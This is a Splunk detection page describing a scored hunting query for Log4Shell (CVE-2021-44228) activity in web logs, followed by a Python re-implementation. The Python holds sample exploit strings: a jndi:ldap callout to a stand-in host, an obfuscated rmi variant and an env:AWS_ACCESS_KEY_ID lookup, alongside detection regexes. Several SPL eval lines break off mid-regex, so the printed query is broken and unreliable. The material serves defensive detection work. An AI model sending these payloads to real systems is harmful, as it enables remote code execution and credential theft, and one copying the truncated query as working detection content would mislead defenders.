

The following hunting query assists with quickly assessing CVE-2021-44228, or Log4Shell, activity mapped to the Web datamodel. It is a combination query that attempts to identify, score and dashboard the activity. Because exploiting the Log4Shell vulnerability requires the malicious string to land in the logs, this query identifies the activity anywhere in the HTTP headers by matching against _raw. Modify the first line to run the same pattern matching against other log sources. Scoring is based on a simple rubric of 0-5, where 5 is the strongest match; patterns scoring less than 5 are meant to identify additional indicators that add up to a higher total score.
The first match, jndi, identifies the standard pattern of {jndi:
jndi_fastmatch is meant to identify any jndi string in the logs. Its score is set low and serves as the "base" score used later.
jndi_proto is a protocol match that identifies jndi followed by one of ldap, ldaps, rmi, dns, nis, iiop, corba, nds, http or https.
all_match is a very thorough regex that identifies nearly all patterns of this attack behavior.
env works to identify environment-variable lookups in the header, meant to capture AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and env.
uri_detect is a string match looking for the common URI paths currently being scanned for and abused in the wild.
keywords matches on enumerated values, such as $ctx:loginId, that may be found in headers used by the adversary.
lookup matching is meant to catch some basic obfuscation that has been identified using the upper, lower and date lookups.
Scoring then occurs based on any findings. The base score of 2 comes from jndi_fastmatch; every other match is meant to increase that score.
Finally, a simple table is created to show the scoring and the _raw field. Sort by score or by the columns of interest.

  • Type: Hunting
  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Web
  • Last Updated: 2021-12-14
  • Author: Michael Haag, Splunk
  • ID: 158b68fa-5d1a-11ec-aac8-acde48001122


ID: T1190 | Technique: Exploit Public-Facing Application | Tactic: Initial Access

| from datamodel Web.Web 
| eval jndi=if(match(_raw, "(\{
| eval jndi_fastmatch=if(match(_raw, "[jJnNdDiI]{4}"),2,0) 
| eval jndi_proto=if(match(_raw,"(?i)jndi:(ldap[s]?
| eval all_match = if(match(_raw, "(?i)(%(25){0,}20
| eval env_var = if(match(_raw, "env:") OR match(_raw, "env:AWS_ACCESS_KEY_ID") OR match(_raw, "env:AWS_SECRET_ACCESS_KEY"),5,0) 
| eval uridetect = if(match(_raw, "(?i)Basic\/Command\/Base64
| eval keywords = if(match(_raw,"(?i)\$\{ctx\:loginId\}
| eval obf = if(match(_raw, "(\$|%24)[^ /]*({|%7b)[^ /]*(j|%6a)[^ /]*(n|%6e)[^ /]*(d|%64)[^ /]*(i|%69)[^ /]*(:|%3a)[^ /]*(:|%3a)[^ /]*(/
| eval lookups = if(match(_raw, "(?i)({
| addtotals fieldname=Score, jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, obf, lookups 
| where Score > 2 
| stats values(Score) by  jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, lookups, obf, _raw 
| `hunting_for_log4shell_filter`
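An added example, not part of the original detection or of Splunk's content: a Python re-implementation of the scoring rubric above, run over constructed httpd access-log lines so the per-pattern scores and the `where Score > 2` cut-off can be checked offline. The jndi_fastmatch (2), jndi_proto (5) and env_var (5) weights are the query's own; the other weights, the regexes written from the prose descriptions, the host names and the log lines are assumptions.

```python
import re

# Scoring rubric (0-5 per pattern) modelled on the hunting query above. Weights
# for jndi_fastmatch (2), jndi_proto (5) and env_var (5) come from the query;
# the others are assumed, since the page truncates those eval lines.
PATTERNS = {
    # any four letters of "jndi" in any case: the low "base" score
    "jndi_fastmatch": (re.compile(r"[jJnNdDiI]{4}"), 2),
    # literal or URL-encoded "{jndi:" opening (assumed weight)
    "jndi": (re.compile(r"(\{|%7[bB])[jJnNdDiI]{4}:"), 4),
    # jndi followed by one of the protocols the text lists
    "jndi_proto": (re.compile(r"(?i)jndi:(ldaps?|rmi|dns|nis|iiop|corba|nds|https?):"), 5),
    # environment-variable lookups, the AWS key names included
    "env_var": (re.compile(r"env:(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY)?"), 5),
    # upper/lower/date lookups used to break the string up (assumed weight)
    "lookups": (re.compile(r"(?i)(\{|%7b)(lower|upper|date)"), 4),
    # the context keyword the text cites (assumed weight)
    "keywords": (re.compile(r"(?i)\$\{ctx:loginId\}"), 4),
}

def score_line(raw):
    """Per-pattern scores plus the addtotals-style total for one raw log line."""
    scores = {name: (weight if rx.search(raw) else 0)
              for name, (rx, weight) in PATTERNS.items()}
    scores["Score"] = sum(scores.values())
    return scores

def hunt(lines, threshold=2):
    """Mirror `where Score > 2`: keep lines earning more than the base score."""
    hits = [(score_line(raw)["Score"], raw) for raw in lines]
    return sorted([h for h in hits if h[0] > threshold], reverse=True)

# Constructed httpd access-log lines (not real traffic) to exercise the rubric.
SAMPLE_LOGS = [
    '10.0.0.5 - - [14/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.example/a}"',
    '10.0.0.9 - - [14/Dec/2021:10:00:03 +0000] "GET /?x=%24%7B%24%7Blower:j%7Dndi:rmi://probe.example/b%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [14/Dec/2021:10:00:04 +0000] "GET /?q=${env:AWS_ACCESS_KEY_ID} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.7 - - [14/Dec/2021:10:00:05 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for score, raw in hunt(SAMPLE_LOGS):
        print(score, raw)  # expect 11, 6 and 5; the benign and base-score-only lines are dropped
```

The third sample shows why the lookups pattern matters: the nested lower lookup and URL-encoded braces defeat the literal jndi and jndi_proto checks, yet the line still scores above the threshold.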

Associated Analytic Story

How To Implement

Out of the box, the Web datamodel is required to be populated. However, testing was performed against raw httpd access logs. Change the first line to any dataset you want to run the regexes against.

Required field

  • _time
  • Web.http_method
  • Web.url
  • Web.url_length
  • Web.src
  • Web.dest
  • Web.http_user_agent
  • _raw

Kill Chain Phase

  • Exploitation

Known False Positives

It is highly possible you will find false positives; however, the base score is set to 2 for any jndi string found in raw logs. Tune and change as needed, and add any filtering required.


Risk Score: 40.0 | Impact: 80 | Confidence: 50 | Message: Hunting for Log4Shell exploitation has occurred.


ID: CVE-2021-44228 | CVSS: 9.3
Summary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.


Test Dataset

Replay any dataset to Splunk Enterprise by using our tool or the UI. Alternatively, you can replay a dataset into a Splunk Attack Range.

source | version: 1